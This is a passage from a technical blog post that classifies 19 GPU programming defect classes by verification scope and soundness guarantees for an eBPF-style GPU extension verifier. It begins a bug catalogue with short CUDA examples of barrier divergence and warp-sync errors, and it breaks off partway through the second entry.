&lt;strong&gt;E (Extension-local)&lt;/strong&gt;: Can be verified by examining only the extension/policy code, without inspecting the host kernel. This is the ideal case: like eBPF, the verifier can provide strong safety guarantees for &lt;em&gt;any&lt;/em&gt; kernel the extension attaches to.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;C (Combined)&lt;/strong&gt;: Requires joint analysis of extension + kernel, or a contract between them. These bugs arise from interactions between policy code and kernel state/behavior.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;H (Host+Device/System)&lt;/strong&gt;: Involves host-side API ordering, driver state, or cross-boundary interactions that cannot be verified by device-side analysis alone.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Assurance Type (Soundness/Completeness guarantees):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;By-construction&lt;/strong&gt;: Bug class is structurally impossible due to language/feature restrictions. &lt;em&gt;Soundness&lt;/em&gt;: perfect (the bug cannot exist). &lt;em&gt;Completeness&lt;/em&gt;: high for policy use cases (restrictions rarely limit legitimate policies).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Static-sound&lt;/strong&gt;: If verifier accepts, property holds; but some safe programs rejected. &lt;em&gt;Soundness&lt;/em&gt;: strong. &lt;em&gt;Completeness&lt;/em&gt;: low (conservative).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Contract-based&lt;/strong&gt;: Requires declared preconditions validated at attach/launch time. &lt;em&gt;Soundness&lt;/em&gt;: conditional on contract correctness. &lt;em&gt;Completeness&lt;/em&gt;: depends on contract expressiveness.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bounded-sound&lt;/strong&gt;: Sound within specified bounds (loop unrolling, context switches). &lt;em&gt;Soundness&lt;/em&gt;: within bounds. &lt;em&gt;Completeness&lt;/em&gt;: limited by bound coverage.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic-only&lt;/strong&gt;: Detected at runtime; no static guarantee. &lt;em&gt;Soundness&lt;/em&gt;: for executed paths only. &lt;em&gt;Completeness&lt;/em&gt;: coverage-dependent.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime-enforced&lt;/strong&gt;: Property enforced via instrumentation/interception. &lt;em&gt;Soundness&lt;/em&gt;: if enforcement is complete. &lt;em&gt;Completeness&lt;/em&gt;: N/A (enforcement, not verification).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why These Dimensions Matter for GPU Extension Verifiers
&lt;/h3&gt;

&lt;p&gt;A GPU extension framework (like &lt;a href="https://arxiv.org/abs/2512.12615" rel="noopener noreferrer"&gt;bpftime gpu_ext&lt;/a&gt;) aims to provide &lt;strong&gt;static verification guarantees&lt;/strong&gt; analogous to eBPF: policy code should be safe to attach to &lt;em&gt;any&lt;/em&gt; kernel without risking crashes, hangs, or unbounded overhead. The key insight is:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Extension-local verification is the only path to strong, universal guarantees.&lt;/strong&gt; If a bug class can be eliminated by restricting the policy language or enforcing invariants on policy code alone, the verifier can guarantee safety without inspecting (potentially closed-source) kernels.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;For &lt;strong&gt;Combined&lt;/strong&gt; bugs, the framework has two options: (1) restrict policy capabilities so the bug becomes Extension-local (e.g., forbid policies from writing kernel memory), or (2) require kernel-side contracts/annotations and validate at attach time.&lt;/p&gt;

&lt;p&gt;For &lt;strong&gt;Host+Device&lt;/strong&gt; bugs, device-side verification is insufficient; these require host-side tooling (CuSan, TSan) or runtime enforcement in the driver/loader.&lt;/p&gt;

&lt;h3&gt;
  
  
  Understanding Soundness vs. Completeness
&lt;/h3&gt;

&lt;p&gt;The &lt;strong&gt;Assurance Type&lt;/strong&gt; dimension makes explicit what guarantees each verification approach provides:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Soundness&lt;/strong&gt; answers: "If the verifier accepts, does the property definitely hold?" A sound verifier never produces false negatives (misses real bugs).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Completeness&lt;/strong&gt; answers: "If the property holds, will the verifier accept?" A complete verifier never produces false positives (rejects safe programs).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For safety-critical GPU extensions, we prioritize &lt;strong&gt;soundness over completeness&lt;/strong&gt;: it's acceptable to reject some safe policies if it means we never accept unsafe ones. The table below shows not just &lt;em&gt;what&lt;/em&gt; can be verified, but &lt;em&gt;how strong&lt;/em&gt; the guarantee is.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Bug Class&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;th&gt;GPU Spec.&lt;/th&gt;
&lt;th&gt;Scope&lt;/th&gt;
&lt;th&gt;Assurance Type&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Barrier Divergence&lt;/td&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (enforce uniform barrier placement)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Invalid Warp Sync&lt;/td&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;By-construction (ban warp sync)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Insufficient Atomic/Sync Scope&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;C→E&lt;/td&gt;
&lt;td&gt;Static-sound (isolate state + device-scope)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Warp-divergence Race&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (uniform side-effects)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Uncoalesced Memory Access&lt;/td&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E/C&lt;/td&gt;
&lt;td&gt;Static-sound (restrict patterns)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Control-Flow Divergence&lt;/td&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (enforce uniformity)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Bank Conflicts&lt;/td&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-heuristic (enforce conflict-free patterns)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Block-Size Dependence&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E/C&lt;/td&gt;
&lt;td&gt;Contract-based (declare requirements)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Launch Config Assumptions&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;C&lt;/td&gt;
&lt;td&gt;Contract-based (validate at attach)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Missing Volatile/Fence&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;By-construction (ban spin-wait)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Shared-Memory Data Races&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (restrict writes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Redundant Barriers&lt;/td&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-heuristic (detect unnecessary barriers)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Host ↔ Device Async Races&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;H&lt;/td&gt;
&lt;td&gt;Dynamic-only (CuSan/TSan)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;Atomic Contention&lt;/td&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;GPU-amplified&lt;/td&gt;
&lt;td&gt;C→E&lt;/td&gt;
&lt;td&gt;Static-sound (budgetize atomics)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;Non-Barrier Deadlocks&lt;/td&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;GPU-amplified&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;By-construction (ban blocking)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;Kernel Non-Termination&lt;/td&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;GPU-amplified&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (bound iterations)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;17&lt;/td&gt;
&lt;td&gt;Global-Memory Data Races&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;CPU-shared&lt;/td&gt;
&lt;td&gt;C→E&lt;/td&gt;
&lt;td&gt;Static-sound (isolate state)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18&lt;/td&gt;
&lt;td&gt;Memory Safety&lt;/td&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;CPU-shared&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (restrict pointers)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;19&lt;/td&gt;
&lt;td&gt;Arithmetic Errors&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;CPU-shared&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (range analysis)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Insights from a Taxonomy of GPU Defects
&lt;/h2&gt;

&lt;p&gt;We conducted a comprehensive study of GPU correctness defects by synthesizing findings from empirical bug analyses (&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;Wu et al.&lt;/a&gt;, &lt;a href="https://akkamath.github.io/files/SOSP21_iGUARD.pdf" rel="noopener noreferrer"&gt;iGUARD&lt;/a&gt;), static verifiers (&lt;a href="https://nchong.github.io/papers/oopsla12.pdf" rel="noopener noreferrer"&gt;GPUVerify&lt;/a&gt;, &lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;GKLEE&lt;/a&gt;, &lt;a href="https://github.com/ssvlab/esbmc-gpu" rel="noopener noreferrer"&gt;ESBMC-GPU&lt;/a&gt;), and runtime detectors (&lt;a href="https://docs.nvidia.com/compute-sanitizer/ComputeSanitizer/index.html" rel="noopener noreferrer"&gt;Compute Sanitizer&lt;/a&gt;, &lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;Simulee&lt;/a&gt;, &lt;a href="https://www.csa.iisc.ac.in/~arkapravab/papers/isca20_ScoRD.pdf" rel="noopener noreferrer"&gt;ScoRD&lt;/a&gt;). Our taxonomy identifies 19 distinct classes of GPU programming defects, uncovering fundamental insights into the unique correctness challenges posed by GPU architectures:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;First&lt;/strong&gt;, we observe that &lt;em&gt;control-flow uniformity&lt;/em&gt; is a foundational correctness requirement for GPU kernels. Non-uniform execution across threads, caused by GPU's SIMT execution model, breaks implicit synchronization assumptions and triggers GPU-specific correctness violations, such as barrier divergence, warp synchronization errors, and subtle warp-divergence races. This insight elevates uniformity from a performance concern to a correctness property that GPU verification frameworks must explicitly enforce.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Second&lt;/strong&gt;, GPU's scoped memory synchronization semantics (e.g., block-scoped atomics, missing fences, volatile misuse) create unique correctness hazards rarely encountered on CPU platforms. Our analysis emphasizes that synchronization primitives' scopes must be explicit, conservative, and verifiable at the kernel level. This requirement is critical for correctness given GPU memory model subtleties.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Third&lt;/strong&gt;, performance interference in GPUs, manifested as uncoalesced accesses, atomic contention, redundant barriers, and bank conflicts, must be viewed as a &lt;em&gt;safety and isolation&lt;/em&gt; concern rather than mere inefficiency. Our taxonomy reveals how adversarial workloads exploit GPU parallelism to amplify performance issues into denial-of-service attacks in multi-tenant environments. Consequently, bounded overhead must be explicitly enforced as a correctness property in GPU extension frameworks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Finally&lt;/strong&gt;, our study highlights that liveness (deadlocks, infinite loops) and memory safety (out-of-bounds accesses, temporal violations) are system-level concerns uniquely amplified by GPU parallelism. Unlike traditional CPU environments, GPU kernel hangs or memory violations can trigger hardware-level recovery affecting all tenants. Thus, GPU liveness and memory safety must be explicitly recognized as first-class system-level correctness properties in verifier designs.&lt;/p&gt;

&lt;p&gt;Together, these insights not only characterize GPU correctness issues more precisely but also inform principled design requirements for GPU kernel extensibility and verification frameworks, moving beyond traditional CPU-centric correctness towards a GPU-aware system correctness definition. We are applying these principles in &lt;a href="https://github.com/eunomia-bpf/bpftime" rel="noopener noreferrer"&gt;bpftime&lt;/a&gt;, you can find more detail in &lt;a href="https://arxiv.org/abs/2512.12615" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Insights from Verification Scope and Assurance Analysis
&lt;/h2&gt;

&lt;p&gt;Beyond characterizing &lt;em&gt;what&lt;/em&gt; can go wrong, we analyze &lt;em&gt;whether and how&lt;/em&gt; each bug class can be addressed by a GPU extension verifier. By examining each defect through the lens of verification scope (Extension-local vs. Combined vs. Host+Device) and assurance type (soundness and completeness guarantees), we arrive at several key conclusions for GPU extension framework design.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Extension-local verification is sufficient for the majority of GPU bug classes.&lt;/strong&gt; Of the 19 defect classes identified, 14 can be fully addressed through Extension-local verification, examining only the policy code without inspecting the host kernel. Some of these (#2, #10, #15) can be eliminated &lt;em&gt;by construction&lt;/em&gt; through language restrictions: banning warp sync primitives, spin-wait patterns, and blocking constructs makes entire bug classes structurally impossible. Others (#1, #7, #12) use &lt;em&gt;static analysis&lt;/em&gt; to enforce safe usage patterns (uniform barrier placement, conflict-free shared-memory access, redundant barrier detection) rather than outright bans, preserving useful functionality while maintaining safety. Four additional classes (#3, #5, #14, #17) that initially appear to require Combined analysis can be &lt;em&gt;reduced to Extension-local&lt;/em&gt; through state isolation, restricting policies to write only policy-owned objects (maps, ringbuffers) rather than kernel data structures. This finding validates the eBPF design philosophy: by appropriately restricting extension capabilities, a verifier can provide strong safety guarantees for &lt;em&gt;any&lt;/em&gt; kernel, including closed-source ones.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Only three bug classes fundamentally resist Extension-local verification.&lt;/strong&gt; Block-size dependence (#8) and launch configuration assumptions (#9) depend on host-determined launch parameters invisible to the policy verifier; these require a contract-based approach where policies declare preconditions validated at attach time. Host↔device async races (#13) span the host API boundary entirely outside device-side verification scope; these can only be addressed through dynamic detection tools like CuSan. Importantly, these three classes represent a small, well-defined subset that can be handled through complementary mechanisms rather than requiring full Combined verification of kernel+extension.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Soundness and completeness trade-offs are explicit and favorable for safety-critical extensions.&lt;/strong&gt; By-construction approaches (banning genuinely dangerous features like spin-wait and blocking primitives) achieve perfect soundness with high completeness for policy use cases. Static-sound approaches (uniform barrier placement, conflict-free access pattern enforcement, uniformity analysis, bounds checking, range analysis) provide strong soundness while preserving useful functionality, at the cost of conservatively rejecting some safe programs. For safety-critical GPU extensions, this trade-off is appropriate: it is better to reject a safe policy than to accept an unsafe one. The verifier's job is to guarantee safety for any kernel, not to accept every possible safe program.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A two-track verification pipeline emerges as the principled design.&lt;/strong&gt; The &lt;em&gt;production track&lt;/em&gt; provides hard guarantees for any kernel through Extension-local verification at load time, contract validation at attach time, and optional runtime enforcement for multi-tenant isolation. The &lt;em&gt;CI/offline track&lt;/em&gt; enhances coverage through Combined analysis tools (GPUVerify, ESBMC-GPU) when kernel source is available, dynamic sanitizers (Compute Sanitizer, iGUARD, Simulee) for regression testing, and host-side race detection (CuSan) for API ordering bugs. This separation acknowledges that Combined verification, while valuable for development and testing, cannot be a production requirement for systems targeting arbitrary kernels.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Performance interference can be bounded but not eliminated.&lt;/strong&gt; While adversarial workloads can systematically amplify interference through shared GPU resources (as demonstrated by "Making Powerful Enemies on NVIDIA GPUs"), the verifier can still provide meaningful guarantees: bounding policy overhead per invocation through instruction/helper budgets, limiting atomic contention through warp-aggregation requirements, and enforcing coalesced access patterns. These guarantees bound the &lt;em&gt;policy's contribution&lt;/em&gt; to interference, even if system-wide slowdown bounds remain impossible to guarantee statically.&lt;/p&gt;

&lt;p&gt;In summary, the verification scope analysis reveals that the eBPF success pattern (restricting extension capabilities to what can be verified without inspecting the host) transfers effectively to GPUs. Through language restrictions, state isolation, and budgetization, a GPU extension verifier can provide strong, universal safety guarantees while relegating the few irreducibly Combined or Host+Device properties to contracts and dynamic detection.&lt;/p&gt;




&lt;h2&gt;
  
  
  Canonical bug list
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1) Barrier Divergence at Block Barriers (&lt;code&gt;__syncthreads&lt;/code&gt;) [Safety, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;A block-wide barrier requires &lt;em&gt;all&lt;/em&gt; threads in the block to reach it. If the barrier is placed under a condition that evaluates differently across threads, some threads wait forever → deadlock / kernel hang. This is treated as a first-class defect in GPU kernel verification (e.g., "barrier divergence" in GPUVerify), and is also one of the main CUDA synchronization bug types characterized/targeted by AuCS/Wu. Note that general control-flow divergence is a performance issue, but barrier divergence is the &lt;em&gt;specific, critical case&lt;/em&gt; where divergent control flow causes threads to reach a barrier non-uniformly, turning a performance issue into a &lt;strong&gt;liveness/correctness failure&lt;/strong&gt; (deadlock).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt; &lt;span class="c1"&gt;// divergent barrier =&amp;gt; UB / deadlock&lt;/span&gt;
  &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mf"&gt;1.0&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUVerify: checking divergence is a core goal ("divergence freedom").(&lt;a href="https://nchong.github.io/papers/oopsla12.pdf" rel="noopener noreferrer"&gt;Nathan Chong&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Simulee detects &lt;strong&gt;barrier divergence bugs&lt;/strong&gt; in real-world code.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Wu et al.: explicitly defines barrier divergence and places it under improper synchronization.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Tools like Compute Sanitizer &lt;code&gt;synccheck&lt;/code&gt; report "divergent thread(s) in block"; Oclgrind can also detect barrier divergence (OpenCL).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static check (GPUVerify-style):&lt;/strong&gt; prove that each barrier is reached by all threads in the relevant scope, often via uniformity reasoning.(&lt;a href="https://nchong.github.io/papers/oopsla12.pdf" rel="noopener noreferrer"&gt;Nathan Chong&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic check:&lt;/strong&gt; synccheck-style runtime validation, and Simulee-style bug finding.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Require &lt;strong&gt;warp-/block-uniform control flow&lt;/strong&gt; for any path reaching a barrier (GPUVerify-style uniform predicate analysis): the verifier statically proves that every &lt;code&gt;__syncthreads()&lt;/code&gt; is reached by all threads in the block, otherwise reject. This allows policies to use barriers for legitimate shared-memory coordination while preventing divergent barriers that cause deadlocks.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-sound. Enforcing uniform barrier placement via static analysis prevents barrier divergence with strong soundness. Policies can use &lt;code&gt;__syncthreads()&lt;/code&gt; when the verifier can prove all threads in the block reach the barrier uniformly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier statically analyzes control flow to ensure every &lt;code&gt;__syncthreads()&lt;/code&gt; call is reached by all threads in the block. Barriers under divergent conditions (e.g., &lt;code&gt;if (threadIdx.x &amp;lt; 16) __syncthreads()&lt;/code&gt;) are rejected. This allows safe barrier usage for shared-memory coordination while preventing GPU hangs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: For kernel-level analysis, GPUVerify proves divergence freedom via static verification; Compute Sanitizer &lt;code&gt;synccheck&lt;/code&gt; detects divergent barriers at runtime; Simulee finds barrier divergence bugs through evolutionary simulation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Some safe barrier placements under complex but provably uniform conditions may be conservatively rejected. The verifier guarantees &lt;em&gt;policy&lt;/em&gt; cannot introduce barrier divergence, but cannot guarantee the &lt;em&gt;kernel&lt;/em&gt; itself is free of this bug; kernel-level bugs require kernel-level tools.&lt;/p&gt;




&lt;h3&gt;
  
  
  2) Invalid Warp Synchronization (&lt;code&gt;__syncwarp&lt;/code&gt; mask, warp-level barriers) [Safety, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Warp-level sync requires correct participation masks. A common failure is calling &lt;code&gt;__syncwarp(mask)&lt;/code&gt; where not all lanes that reach the barrier are included in &lt;code&gt;mask&lt;/code&gt;, or where divergence causes only a subset to arrive.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mi"&gt;31&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__syncwarp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0xffffffff&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// only 16 lanes arrive, but mask expects all 32&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lane&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Compute Sanitizer &lt;code&gt;synccheck&lt;/code&gt; explicitly reports "Invalid arguments" and "Divergent thread(s) in warp" classes for these hazards.(&lt;a href="https://docs.nersc.gov/tools/debug/compute-sanitizer/" rel="noopener noreferrer"&gt;NERSC Documentation&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;iGUARD discusses how newer CUDA features (e.g., independent thread scheduling + cooperative groups) create new race/sync hazards beyond the classic model.(&lt;a href="https://akkamath.github.io/files/SOSP21_iGUARD.pdf" rel="noopener noreferrer"&gt;Aditya K Kamath&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Runtime validation via &lt;code&gt;synccheck&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Static analysis to verify mask correctness at each &lt;code&gt;__syncwarp&lt;/code&gt; callsite.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

